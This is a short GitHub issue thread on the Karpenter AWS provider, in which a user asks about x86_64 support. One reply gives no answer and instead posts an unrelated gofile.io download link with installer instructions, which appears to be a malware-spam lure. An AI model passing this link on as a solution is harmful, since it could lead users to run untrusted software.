### ISSUE TITLE
Please include compatibility of karpenter with x84_64 arch ec2

### ISSUE THREAD

**Issue by tanpsingh** [aws/karpenter-provider-aws#6922]
### Description

As per doc https://karpenter.sh/docs/concepts/nodepools/#architecture, Karpenter supports linux and windows operating systems. Our applications uses x86_64 architecture/

Please include compatibility of karpenter with x84_64 arch OS.

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by tanpsingh** [comment]
The download is blocked.
